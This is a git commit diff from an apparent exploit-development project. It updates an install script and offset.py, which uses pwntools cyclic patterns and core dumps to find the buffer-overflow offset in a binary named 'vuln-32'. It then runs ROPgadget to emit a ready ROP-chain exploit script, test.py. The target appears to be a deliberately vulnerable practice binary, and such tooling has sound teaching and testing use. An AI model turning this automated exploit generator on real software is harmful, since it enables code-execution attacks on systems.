Run ROPGadget with auto offset

Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
2020-11-25 15:38:08 +00:00 · 2020-11-25 15:38:08 +00:00 · 688bb5a1be
commit 688bb5a1be
parent a8cbc66faf
2 changed files with 31 additions and 13 deletions
--- a/init.sh
+++ b/init.sh
@ -9,6 +9,7 @@ sudo apt-get --quiet --assume-yes install gcc-multilib
 sudo apt-get --quiet --assume-yes install zsh
 sudo apt-get --assume-yes --quiet install python3 python3-pip python3-dev git libssl-dev libffi-dev
 sudo apt-get --assume-yes --quiet install python
 python3 -m pip install --upgrade pip
 python3 -m pip install --upgrade pwntools
--- a/offset.py
+++ b/offset.py
@ -2,11 +2,15 @@ from pwnlib.elf.corefile import Coredump
 from pwnlib.util.cyclic import cyclic, cyclic_find
 from pwnlib.util.packing import pack
 from pwnlib.tubes.process import process
 import os
 import os
 import subprocess
 exec_name = "./vuln-32"
 def find_offset(exec_name):
    # TODO: command line arguments
    input_file = "input.txt"
 exec_name = "./vuln-32"
    core_file = "./core"
    os.remove(core_file)
@ -22,6 +26,19 @@ core = Coredump('./core')
    assert pack(core.eip) in payload
 print(cyclic_find(core.eip))
    os.remove(input_file)
    return cyclic_find(core.eip)
 offset = find_offset(exec_name)
 # print("\t# Padding goes here") <-- search for this
 # print("\tp = ''\n")
 result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
 stdout = result.stdout
 stdout = stdout.replace(b"p = ''\n", b"p = \"" + bytes('a' * offset, 'ascii') + b"\"\n")
 with open("test.py", "wb") as f:
    f.write(stdout)